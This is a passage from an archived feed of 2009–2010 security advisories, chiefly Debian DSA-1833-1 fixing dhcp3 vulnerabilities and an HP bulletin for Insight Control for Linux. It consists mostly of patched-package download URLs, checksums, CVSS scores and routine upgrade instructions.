http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 290520 41251b845417290082cead454420009a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 102132 40ccebf82e99c1f2228d0304c7c10bb0\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 400296 447643661f0ef198381636421a817e15\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 347478 0ee8f2058fca1d30fdcb4eed2e82b6b1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 159842 12d61f96202f3f68b9aff09424d79348\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 508044 130ffd524faa48178f124befdc150e47\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 464766 bf7266a768cc90bd76c785624cb4089d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_ia64.udeb\r\n Size/MD5 checksum: 289288 ee79b20eefaf229fb46ada9bc6ae56bf\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 155048 8ecc258935ffd55300285fc775d9f1b9\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 359176 fb5bd87ef5481f1f43c9a45dfcd3ce37\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 309030 90233c8ed44269bba30f16b0e8a84450\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 245844 16982508add38de5d1dc7e465e484d14\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 114538 291ed9f1bc54e3b8082ca4633185796c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 314358 270b38430ca3b97245c29ac4dc314172\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mips.udeb\r\n Size/MD5 checksum: 188178 334dd27da8522f16bf58ac31e4d3dac2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 124312 aef53193ecfafb6c1433223f19242a35\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 362162 67743cf382e17cfab714158bb0f37561\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 247664 b5494e175f7be190ddb2390d2b55ca79\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 310866 6387812c812dafa3b63ed7b139c48f74\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 116224 bf5038fb4e9d79beea543376f91a5404\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mipsel.udeb\r\n Size/MD5 checksum: 190284 1da972b8dd8e57d7ed1e62b387329d43\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 317228 9df2929f942d894260e0783cba8668c0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 125528 34a0a833a1d5626232a7f6b0891d6fa9\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 305096 f3d385927548fe52fde1070280bda9a9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 111500 9d03e2dc815e1f2bb383f677aaf86eb9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_powerpc.udeb\r\n Size/MD5 checksum: 183812 82bce24908b4088c62c9d6d7622d3ac2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 310594 97b0fd83d73c1aec8784e97a92b77ee1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 354430 0e7fc5b85c1474674e8aa1f506bbf815\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 118796 2af645bbf54897306a52a7b072cdded1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 241116 7748b01950150c4cec91d2f361c5e403\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 303410 0681214517ad4e1746d0f30a6af3854f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 348930 cda6066a1d5cfa599383e38201b662c0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 112420 cb2a4679d4d187e6373df2e8fb7de53e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_s390.udeb\r\n Size/MD5 checksum: 182114 55db5122f2cb6acc7169911f40c5646a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 117568 6e16df93aabfcb6892de03e3c7d9c35b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 239446 5c93734c0bd94ef02c726730418ab49c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 303678 5924002054a4233ea16e4e8769821f49\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_sparc.udeb\r\n Size/MD5 checksum: 161504 f4ae7e33ec0fae6818f0cae625925ee9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 218292 f4b7091a070b4dc413eb4d3e319b88f9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 109326 fe50b4989d1b397347621c5c4fef23af\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 101564 60fd708e4dcda554af9ede9b9cc396a9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 280070 7ee763f435a4881ac7f719030e59b8d0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 283656 2a79cfc252c6a772d16e34845984a5ac\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 325588 168e42992477d7e845d1d9bfde4b1cad\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJKXN4MAAoJEL97/wQC1SS+KcMH/23ILsf1BwOp+a17sitTdhZm\r\noKnIGop6vSyFddnXXvnNiPq9xQDEhZNfqJhwmeKWJ5sqYF4pzSYNU0NIJnsqzih1\r\nAsKRPXsYHnYCKyvq6y0BQ8216JehPw1zmltHB1eHEfDXFHoMGu3M/3NHkAyD3VHq\r\naXty2+UTELODe5CCeic0aa7waJDJGpfZdJYlV7nT4FrarwgLze42LepD9TpfILPX\r\novXg8eNdxu8TufsfwqNZyPfmkQYgeMXGHgPDB0epY3FsOsMQZygNq4r/T20o8UV/\r\nWfvvLTOVAtiRoc6OlyMh3aUtyQ0rbhyOgwwpOHqTyxlpFHsmFHNTj1gZvsvYWB8=\r\n=qS68\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2009-07-15T00:00:00", "published": "2009-07-15T00:00:00", "id": "SECURITYVULNS:DOC:22168", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22168", "title": "[Full-disclosure] [SECURITY] [DSA 1833-1] New dhcp3 packages fix arbitrary code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02286083\r\nVersion: 1\r\n\r\nHPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote\r\nDenial of Service (DoS), Remote Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-07-12\r\nLast Updated: 2010-07-13\r\n\r\nPotential Security Impact: Remote execution of arbitrary code, remote Denial of Service (DoS), remote\r\nunauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with Insight Control for Linux (IC-LX). The\r\nvulnerabilities could be remotely exploited to allow execution of arbitrary code, remote Denial of Service\r\n(DoS), and remote unauthorized access.\r\n\r\nReferences: CVE-2009-0692, CVE-2007-5497, CVE-2007-2452, CVE-2010-0001, CVE-2010-1129, CVE-2008-5110\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control for Linux 6.0 and previous versions\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-0692 (AV:A/AC:L/Au:N/C:C/I:C/A:C) 8.3\r\nCVE-2007-5497 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 4.9\r\nCVE-2007-2452 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.4\r\nCVE-2010-0001 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2010-1129 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2008-5110 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nNote: HP Insight Control for Linux v6.1 incorporates updated packages that include security updates for\r\nDhclient, E2fsprogs, Findutils, Gzip, PHP and Syslog-ng.\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Insight Control for Linux v6.1 to resolve this vulnerability. The updated kit can be\r\ndownloaded as follows. Browse to http://www.hp.com/go/ic-lx and click on Software Downloads.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 12 July 2010 Initial Release\r\nVersion:2 (rev.2) - 13 July 2010 Changed abbreviated name to IC-LX\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided "as is" without warranty of any kind. To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkw95MoACgkQ4B86/C0qfVnUOACg7rgVtWZ1jWPchP3cgJtpdX48\r\nLg8AoMGWbdYeZGvEnlEfvQfX6AQKBGrK\r\n=mAva\r\n-----END PGP SIGNATURE-----", "modified": "2010-07-18T00:00:00", "published": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24273", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24273", "title": "[security bulletin] HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "description": ">20 vulnerabilities in different applications are fixed.", "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11009", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11009", "title": "Hewlett Packard applications multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:15:04", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1833-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 14, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dhcp3\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-0692 CVE-2009-1892\nCERT advisory : VU#410676\n\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using "dhcp-client-identifier"\nand "hardware ethernet". This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\n\nFor the unstable distribution (sid), these problems will be fixed\nsoon.\n\nWe recommend that you upgrade your dhcp3 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.diff.gz\n Size/MD5 checksum: 116721 6d49a9fb6b0617aba87cd90abef5bd57\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4.orig.tar.gz\n Size/MD5 checksum: 721450 aeb916fbb50edc320f142cd6a74cb48c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.dsc\n Size/MD5 checksum: 1077 50aac538f9bb0e11e878758d754b1e14\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 157948 502301a6539a30b14cd2d6c8fb1bd032\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 113528 c89f3dfd91bbb2d8850359b78f5eae66\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_alpha.udeb\n Size/MD5 checksum: 192724 a4b5cab9e6f14ad9a80bef648435b86c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 240720 48996d54bf9d3fbae7d0a4f2b0e76224\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 304078 2e58f7af0c23b07b81b7e88031ec22b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 346552 96169b1056055a13cbfb13fb8f73b061\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_amd64.udeb\n Size/MD5 checksum: 174734 3de2c8f75f8d6df63870c2d9638c8ae6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 287422 052994dc5544eacac9b22837bba47660\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 222104 185470021c69635074e4d09a05275f49\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 131134 33fbb0278c39d36b2a0dd3819e192493\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 321874 e3ce73d54b47a930e440626672fcd521\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 103610 04e95fd257de2ca592e09cf8927b9c37\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 99498 8098ab4856d359049538213ec0fa4a75\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_arm.udeb\n Size/MD5 checksum: 167040 21fcc83a87ed431f9d03b0479b522dd2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 280430 9355307446248854bffbe49a2120d450\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 215172 0ab20469ee9fe1ccf05bfe40b68bc2d7\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 123860 2b69130163d2cb83009710081a5be3ea\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 314402 191cff362f2ceb557495d037aa2310c8\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 103994 3cbfc2d7eea1de9bf64f84d31889bf75\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_hppa.udeb\n Size/MD5 checksum: 171728 68bc286a4261035d72bbb1a63eb08dd9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 219790 b8e006bf59ac068513e4bb35c4c96d2d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 139516 ee6ad7d1fd911b98cd40290823cdd50d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 319134 d36a40e22c468e76386b2ab6befd8424\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 285302 09641cca4ba379d61c1dca0fbde543fb\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 265170 5f0e7243ba3c59251a236b332fa0818f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 290962 ecb192ccc56b7982a8c60e54e4d55bbb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 198194 fe580c33e7953d727015063e3e24d209\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 92416 686a574fea049cf930757230f86af87b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_i386.udeb\n Size/MD5 checksum: 150410 d3747839582b942b155f427a4034f6b7\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 116952 340249d4e0ba06007f063b501dfeac0e\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 460536 81350e4d73103ffe454ae70a3f2ab967\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 381784 161f51028930ea9a1a078e9f6bc8070c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 325064 b51fa5cffbfd6e8daa2319ce287e6310\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 182712 0961dfa19e58b2fda1b397cccf0c56b2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_ia64.udeb\n Size/MD5 checksum: 276972 7f96a3e76a36e8ecb74ae56a3066db91\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 150950 b62bfa283012eefe6123e4d57eafb95b\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mips.udeb\n Size/MD5 checksum: 178822 f5413f7bc85b1c4f2b1c5fc1310b5101\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 290490 a1df2dcfa3ccd3b787822d92979d1879\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 227208 6795dad252df73ccad7093284117bc14\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 137836 f3cb677fc63e5ad63d0ffb038bac2d8e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 327612 a84dd37caf4e3a076d17fbb30e242656\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 107814 a6c576fe51309fa51bc852e3cb061051\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 289074 4c60b9d7ed1e6ebcc0a3e4233b4bad3b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 225724 65671425f5a4d6468933dd782807ad0b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 107314 2be8a4eb41d646e9aee26f1f2c02e63b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mipsel.udeb\n Size/MD5 checksum: 177428 38810775a90a8dcaf51ecd4b62ff62d3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 137384 e5b6a97e69a9b63f22762bf74c79bdfe\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 325660 db87a9bd8bcf73ffab1bf87171c4d18f\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 95268 51a2d9e53a0d0d9bf3d948f8d2a045e4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 270644 29d8e657d95c12f489215de503c24ffb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_powerpc.udeb\n Size/MD5 checksum: 155886 0ac02169c239b24ad9fddfa5e237186a\n 